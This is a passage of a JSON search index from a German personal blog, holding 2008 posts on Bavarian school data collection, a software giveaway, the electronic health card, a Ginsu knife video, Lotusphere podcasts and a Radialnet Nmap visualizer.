\u0026lt;li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;span \u003cspan style=\"color:#268bd2\"\u003estyle\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;color: #333333; font-family: \u0026#39;Lucida Grande\u0026#39;; line-height: 18px;\u0026#34;\u003c/span\u003e\u0026gt;Ergebnisse der zentralen Abschlussprüfung\u0026lt;/span\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;span \u003cspan style=\"color:#268bd2\"\u003estyle\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;color: #333333; font-family: \u0026#39;Lucida Grande\u0026#39;; line-height: 18px;\u0026#34;\u003c/span\u003e\u0026gt;Namen und Adresse der Eltern\u0026lt;/span\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;span \u003cspan style=\"color:#268bd2\"\u003estyle\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;color: #333333; font-family: \u0026#39;Lucida Grande\u0026#39;; line-height: 18px;\u0026#34;\u003c/span\u003e\u0026gt;weitere Daten\u0026lt;/span\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/ul\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;/li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e[\u0026amp;\u003cspan style=\"color:#93a1a1;font-style:italic\"\u003e#8230;]\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;span \u003cspan style=\"color:#268bd2\"\u003estyle\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;color: #333333; font-family: \u0026#39;Lucida Grande\u0026#39;; line-height: 18px;\u0026#34;\u003c/span\u003e\u0026gt;Es soll jederzeit durch Rechtsverordnung des Ministeriums möglich sein, weitere Daten einzubeziehen.\u0026lt;br /\u0026gt; \u0026lt;span \u003cspan style=\"color:#268bd2\"\u003estyle\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;color: #000000; font-family: Helvetica; line-height: normal;\u0026#34;\u003c/span\u003e\u0026gt;[From \u0026lt;a \u003cspan style=\"color:#268bd2\"\u003ehref\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;http://www.daten-speicherung.de/index.php/bayern-plant-totalerhebung-von-schueler-eltern-und-lehrerdaten/\u0026#34;\u003c/span\u003e\u0026gt;\u0026lt;cite\u0026gt;Bayern plant „Totalerhebung“ von Schüler-, Eltern- und Lehrerdaten\u0026lt;/cite\u0026gt;\u0026lt;/a\u0026gt;]\u0026lt;/span\u0026gt;\u0026lt;/span\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eDiesen Satz finde ich die Oberfrechheit! Um nicht eine Gesetzesänderung\nzu benötigen, wenn man die DB erweitern will, läßt man sich hier einen\nFreibrief erstellen für die Speicherung und Erhebung weiterer Daten.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-04-03-bayern-plant-totalerhebung-von-schuler-eltern-und-lehrerdaten/","title":"Bayern plant „Totalerhebung“ von Schüler-, Eltern- und Lehrerdaten"},{"body":"Folgende Lizenzen werden verlost. » Gewinnspiel « Macinme\nDer Podcast / Seite macinme verlost folgende Softwareprodukte:\n\u0026lt;li\u0026gt; \u0026lt;b\u0026gt;1x \u0026lt;a href=\u0026#34;http://www.chipmunk-app.com/\u0026#34;\u0026gt;Chipmunk\u0026lt;/a\u0026gt;\u0026lt;/b\u0026gt; \u0026amp;#8211; Einfaches Auffinden doppelter Dateien auf dem Computer \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;b\u0026gt;5x \u0026lt;a href=\u0026#34;http://www.maccoremac.com/\u0026#34;\u0026gt;Mental Case\u0026lt;/a\u0026gt;\u0026lt;/b\u0026gt; \u0026amp;#8211; Lernen mit Karteikarten, nur besser \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;b\u0026gt;10x \u0026lt;a href=\u0026#34;http://myownapp.com/suite_app.html\u0026#34;\u0026gt;MOApp Suite\u0026lt;/a\u0026gt;\u0026lt;/b\u0026gt; \u0026amp;#8211; Das bessere Office \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;b\u0026gt;1x \u0026lt;a href=\u0026#34;http://infinitenil.com/packrat/\u0026#34;\u0026gt;PackRat\u0026lt;/a\u0026gt;\u0026lt;/b\u0026gt; \u0026amp;#8211; Backpack Client für den Mac und ein wahres Organisationstalent \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;b\u0026gt;1x \u0026lt;a href=\u0026#34;http://codesorcery.net/pukka/\u0026#34;\u0026gt;Pukka\u0026lt;/a\u0026gt;\u0026lt;/b\u0026gt; \u0026amp;#8211; Der beliebte Client für del.icio.us \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;b\u0026gt;1x \u0026lt;a href=\u0026#34;http://hogbaysoftware.com/products/taskpaper\u0026#34;\u0026gt;TaskPaper\u0026lt;/a\u0026gt;\u0026lt;/b\u0026gt; \u0026amp;#8211; Endlich seine Aufgaben \u0026lt;em\u0026gt;erledigen\u0026lt;/em\u0026gt; \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;b\u0026gt;2x \u0026lt;a href=\u0026#34;http://www.manytricks.com/tubitunes/\u0026#34;\u0026gt;TubiTunes\u0026lt;/a\u0026gt;\u0026lt;/b\u0026gt; \u0026amp;#8211; ganz einfach Clips von YouTube \u0026amp; Co. in iTunes und auf iPod / iPhone packen \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;b\u0026gt;1x \u0026lt;a href=\u0026#34;http://hogbaysoftware.com/products/writeroom\u0026#34;\u0026gt;WriteRoom\u0026lt;/a\u0026gt;\u0026lt;/b\u0026gt; \u0026amp;#8211; Konzentriert schreiben ohne gestört zu werden \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;b\u0026gt;3x Lizenzen; Programm wird am Mi, den 02.04.2008 bekannt gegeben\u0026lt;/b\u0026gt; \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;b\u0026gt;5x Lizenzen; Programm wird am Do, den 03.04.2008 bekannt gegeben\u0026lt;/b\u0026gt; \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;b\u0026gt;10x Lizenzen; Programm wird am Fr, den 04.04.2008 bekannt gegeben\u0026lt;/b\u0026gt; \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;b\u0026gt;Specials:\u0026lt;a href=\u0026#34;http://macinme.de/gewinnspiel/#specialthing\u0026#34;\u0026gt;\u0026lt;sup\u0026gt;*\u0026lt;/sup\u0026gt;\u0026lt;/a\u0026gt;\u0026lt;/b\u0026gt; \u0026lt;/li\u0026gt; \u0026lt;ul\u0026gt; \u0026lt;li\u0026gt; \u0026lt;b\u0026gt;1x \u0026lt;a href=\u0026#34;http://mac.synthesisstudios.com/mac/filespot/about\u0026#34;\u0026gt;FileSpot\u0026lt;/a\u0026gt;\u0026lt;/b\u0026gt; \u0026amp;#8211; Spotlight für Fortgeschrittene \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;b\u0026gt;3x \u0026lt;a href=\u0026#34;http://www.parallels.com/de/products/desktop/\u0026#34;\u0026gt;Parallels Desktop 3.0 für Mac inkl. Update auf Version 4\u0026lt;/a\u0026gt;\u0026lt;/b\u0026gt; \u0026amp;#8211; Wozu Windows, wenn man auch Parallels benutzen kann? \u0026lt;/li\u0026gt; \u0026lt;/ul\u0026gt; Ich finde das eine coole Sache und hoffe das evtl. Pukka für mich abfällt. :-)\n","excerpt":"\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eFolgende Lizenzen werden verlost.\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e» Gewinnspiel « Macinme\u003c/p\u003e\n\u003cp\u003eDer Podcast / Seite macinme verlost folgende Softwareprodukte:\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;b\u0026gt;1x \u0026lt;a \u003cspan style=\"color:#268bd2\"\u003ehref\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;http://www.chipmunk-app.com/\u0026#34;\u003c/span\u003e\u0026gt;Chipmunk\u0026lt;/a\u0026gt;\u0026lt;/b\u0026gt; \u0026amp;\u003cspan style=\"color:#93a1a1;font-style:italic\"\u003e#8211; Einfaches Auffinden doppelter Dateien auf dem Computer\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;/li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;b\u0026gt;5x \u0026lt;a \u003cspan style=\"color:#268bd2\"\u003ehref\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;http://www.maccoremac.com/\u0026#34;\u003c/span\u003e\u0026gt;Mental Case\u0026lt;/a\u0026gt;\u0026lt;/b\u0026gt; \u0026amp;\u003cspan style=\"color:#93a1a1;font-style:italic\"\u003e#8211; Lernen mit Karteikarten, nur besser\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;/li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;b\u0026gt;10x \u0026lt;a \u003cspan style=\"color:#268bd2\"\u003ehref\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;http://myownapp.com/suite_app.html\u0026#34;\u003c/span\u003e\u0026gt;MOApp Suite\u0026lt;/a\u0026gt;\u0026lt;/b\u0026gt; \u0026amp;\u003cspan style=\"color:#93a1a1;font-style:italic\"\u003e#8211; Das bessere Office\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;/li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;b\u0026gt;1x \u0026lt;a \u003cspan style=\"color:#268bd2\"\u003ehref\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;http://infinitenil.com/packrat/\u0026#34;\u003c/span\u003e\u0026gt;PackRat\u0026lt;/a\u0026gt;\u0026lt;/b\u0026gt; \u0026amp;\u003cspan style=\"color:#93a1a1;font-style:italic\"\u003e#8211; Backpack Client für den Mac und ein wahres Organisationstalent\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;/li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;b\u0026gt;1x \u0026lt;a \u003cspan style=\"color:#268bd2\"\u003ehref\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;http://codesorcery.net/pukka/\u0026#34;\u003c/span\u003e\u0026gt;Pukka\u0026lt;/a\u0026gt;\u0026lt;/b\u0026gt; \u0026amp;\u003cspan style=\"color:#93a1a1;font-style:italic\"\u003e#8211; Der beliebte Client für del.icio.us\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;/li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;b\u0026gt;1x \u0026lt;a \u003cspan style=\"color:#268bd2\"\u003ehref\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;http://hogbaysoftware.com/products/taskpaper\u0026#34;\u003c/span\u003e\u0026gt;TaskPaper\u0026lt;/a\u0026gt;\u0026lt;/b\u0026gt; \u0026amp;\u003cspan style=\"color:#93a1a1;font-style:italic\"\u003e#8211; Endlich seine Aufgaben \u0026lt;em\u0026gt;erledigen\u0026lt;/em\u0026gt;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;/li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;b\u0026gt;2x \u0026lt;a \u003cspan style=\"color:#268bd2\"\u003ehref\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;http://www.manytricks.com/tubitunes/\u0026#34;\u003c/span\u003e\u0026gt;TubiTunes\u0026lt;/a\u0026gt;\u0026lt;/b\u0026gt; \u0026amp;\u003cspan style=\"color:#93a1a1;font-style:italic\"\u003e#8211; ganz einfach Clips von YouTube \u0026amp; Co. in iTunes und auf iPod / iPhone packen\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;/li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;b\u0026gt;1x \u0026lt;a \u003cspan style=\"color:#268bd2\"\u003ehref\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;http://hogbaysoftware.com/products/writeroom\u0026#34;\u003c/span\u003e\u0026gt;WriteRoom\u0026lt;/a\u0026gt;\u0026lt;/b\u0026gt; \u0026amp;\u003cspan style=\"color:#93a1a1;font-style:italic\"\u003e#8211; Konzentriert schreiben ohne gestört zu werden\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;/li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;b\u0026gt;3x Lizenzen; Programm wird am Mi, den 02.04.2008 bekannt gegeben\u0026lt;/b\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;/li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;b\u0026gt;5x Lizenzen; Programm wird am Do, den 03.04.2008 bekannt gegeben\u0026lt;/b\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;/li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;b\u0026gt;10x Lizenzen; Programm wird am Fr, den 04.04.2008 bekannt gegeben\u0026lt;/b\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;/li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;b\u0026gt;Specials:\u0026lt;a \u003cspan style=\"color:#268bd2\"\u003ehref\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;http://macinme.de/gewinnspiel/#specialthing\u0026#34;\u003c/span\u003e\u0026gt;\u0026lt;sup\u0026gt;*\u0026lt;/sup\u0026gt;\u0026lt;/a\u0026gt;\u0026lt;/b\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;/li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;ul\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;b\u0026gt;1x \u0026lt;a \u003cspan style=\"color:#268bd2\"\u003ehref\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;http://mac.synthesisstudios.com/mac/filespot/about\u0026#34;\u003c/span\u003e\u0026gt;FileSpot\u0026lt;/a\u0026gt;\u0026lt;/b\u0026gt; \u0026amp;\u003cspan style=\"color:#93a1a1;font-style:italic\"\u003e#8211; Spotlight für Fortgeschrittene\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;b\u0026gt;3x \u0026lt;a \u003cspan style=\"color:#268bd2\"\u003ehref\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;http://www.parallels.com/de/products/desktop/\u0026#34;\u003c/span\u003e\u0026gt;Parallels Desktop 3.0 für Mac inkl. Update auf Version 4\u0026lt;/a\u0026gt;\u0026lt;/b\u0026gt; \u0026amp;\u003cspan style=\"color:#93a1a1;font-style:italic\"\u003e#8211; Wozu Windows, wenn man auch Parallels benutzen kann?\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/li\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;/ul\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eIch finde das eine coole Sache und hoffe das evtl. Pukka für mich\nabfällt. :-)\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-04-01-macinme-verlost-software/","title":"Macinme verlost Software"},{"body":"Jetzt gibt es endlich ein Messer, mit dem man nicht nur Hämmer oder Konservendosen durchschneiden kann und das auch vor Kartoffeln nicht halt macht.\n\u0026lt;a href=\u0026#34;http://www.metacafe.com/watch/1035606/jedi_ginsu_knife_commercial/\u0026#34;\u0026gt;\u0026lt;cite\u0026gt;Jedi Ginsu Knife Commercial Video\u0026lt;/cite\u0026gt;\u0026lt;/a\u0026gt; via http://feeds.feedburner.com/ r/guennersen/3/254122896/[Guennersen]\nHier noch der Originalwerbespot des Ginsu Knife .\n","excerpt":"\u003cp\u003eJetzt gibt es endlich ein Messer, mit dem man nicht nur Hämmer oder\nKonservendosen durchschneiden kann und das auch vor Kartoffeln nicht\nhalt macht.\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;a \u003cspan style=\"color:#268bd2\"\u003ehref\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;http://www.metacafe.com/watch/1035606/jedi_ginsu_knife_commercial/\u0026#34;\u003c/span\u003e\u0026gt;\u0026lt;cite\u0026gt;Jedi Ginsu Knife Commercial Video\u0026lt;/cite\u0026gt;\u0026lt;/a\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003evia \u003ca href=\"http://feeds.feedburner.com/\" target=\"_blank\"\u003ehttp://feeds.feedburner.com/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003csub\u003er/guennersen/\u003c/sub\u003e3/254122896/[Guennersen]\u003c/p\u003e\n\u003cp\u003eHier noch der\n\u003ca href=\"http://www.youtube.com/watch?v=abLB7aTmnE4\" target=\"_blank\"\u003eOriginalwerbespot \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n des\n\u003ca href=\"http://en.wikipedia.org/wiki/Ginsu\" target=\"_blank\"\u003eGinsu Knife \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-03-21-das-ultimative-kuchenmesser/","title":"Das ultimative Küchenmesser"},{"body":"dass die geplante technische Infrastruktur noch nicht in Betrieb genommen werden kann, da die offizielle Ausschreibung der Public-Key-Infrastruktur (PKI) des zentralen Backbone-Server-Verbundes bislang immer noch nicht abgeschlossen ist. CCC | Chaos Computer Club warnt vor unabsehbaren Risiken bei der elektronischen Gesundheitskarte\nEs ist wirklich unglaublich, wie unbekümmert hier mit zum Teil sensiblen Daten umgegangen wird. Nachdem die konkrete Sicherheitsstruktur noch nicht ausgeschrieben ist, wäre es an der Zeit dieses Milliardengrab abzusagen.\n","excerpt":"\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003edass die geplante technische Infrastruktur noch nicht in Betrieb genommen werden kann, da die offizielle Ausschreibung der Public-Key-Infrastruktur (PKI) des zentralen Backbone-Server-Verbundes bislang immer noch nicht abgeschlossen ist.\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eCCC | Chaos Computer Club warnt vor unabsehbaren Risiken bei der\nelektronischen Gesundheitskarte\u003c/p\u003e\n\u003cp\u003eEs ist wirklich unglaublich, wie unbekümmert hier mit zum Teil sensiblen\nDaten umgegangen wird. Nachdem die konkrete Sicherheitsstruktur noch\nnicht ausgeschrieben ist, wäre es an der Zeit dieses Milliardengrab\nabzusagen.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-03-17-ccc-chaos-computer-club-warnt-vor-unabsehbaren-risiken-bei-der-elektronischen-gesundheitskarte/","title":"CCC | Chaos Computer Club warnt vor unabsehbaren Risiken bei der elektronischen Gesundheitskarte"},{"body":"Momentan gibt es nicht viel zu bloggen.\nIm Büro bereite ich verschiedene Projekte vor, aber noch nichts ist Wert fürs Blog.\nGestern habe ich mit Tobi zusammen die Trennwand in meinem Wohnzimmer begonnen. Die erste Hälfte ist fertig und das neue Kinderzimmer nimmt Gestalt an. Die Katzen sind etwas verwirrt, weil jetzt die Couch und einige Stühle anders stehen, aber sie werden sich daran gewöhnen.\n","excerpt":"\u003cp\u003eMomentan gibt es nicht viel zu bloggen.\u003c/p\u003e\n\u003cp\u003eIm Büro bereite ich verschiedene Projekte vor, aber noch nichts ist Wert\nfürs Blog.\u003c/p\u003e\n\u003cp\u003eGestern habe ich mit Tobi zusammen die Trennwand in meinem Wohnzimmer\nbegonnen. Die erste Hälfte ist fertig und das neue Kinderzimmer nimmt\nGestalt an. Die Katzen sind etwas verwirrt, weil jetzt die Couch und\neinige Stühle anders stehen, aber sie werden sich daran gewöhnen.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-03-09-nicht-viel-neues/","title":"Nicht viel Neues"},{"body":"Die Podcasts der letzten Lotusphere gibt es unter folgendem Link zum Download:\nEine genaue Anleitung wie der Download funktioniert findet sich bei Volker Weber im Blog.\nIBM has made the Lotusphere podcasts available for download : “I have no idea whether they do this on purpose but IBM has made the podcasts available on the internet.”\n(Via http://vowe.net/ [\nvowe dot net ::].)\n","excerpt":"\u003cp\u003eDie Podcasts der letzten Lotusphere gibt es unter folgendem Link zum\nDownload:\u003c/p\u003e\n\u003cp\u003eEine genaue Anleitung wie der Download funktioniert findet sich bei\n\u003ca href=\"http://www.vowe.net\" target=\"_blank\"\u003eVolker Weber \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n im Blog.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://vowe.net/archives/009193.html\" target=\"_blank\"\u003eIBM has made the Lotusphere\npodcasts available for download \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n: “I have no idea whether they do this\non purpose but IBM has made the podcasts available on the internet.”\u003c/p\u003e\n\u003cp\u003e(Via \u003ca href=\"http://vowe.net/\" target=\"_blank\"\u003ehttp://vowe.net/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n[\u003cbr\u003e\nvowe dot net ::].)\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-02-16-ibm-has-made-the-lotusphere-podcasts-available-for-download/","title":"IBM has made the Lotusphere podcasts available for download"},{"body":"Cooles Tool, ich werde das gleich mal am Montag testen und versuchen den aktuellen Netzwerkplan damit zu überprüfen.\nAus diesen Daten erstellt Radialnet ein Netzdiagramm, das der Betrachter in verschiedenen Zoom-Stufen, aus mehreren Perspektiven sowie in einer Weitwinkelansicht betrachten kann. Radialnet 0.4 visualisiert Nmap-Scans im Detail « NEWS « Linux-Magazin Online\nBlogged with Flock\nTags: Linux, Netzwerk\n","excerpt":"\u003cp\u003eCooles Tool, ich werde das gleich mal am Montag testen und versuchen den\naktuellen Netzwerkplan damit zu überprüfen.\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eAus diesen Daten erstellt Radialnet ein Netzdiagramm, das der Betrachter in verschiedenen 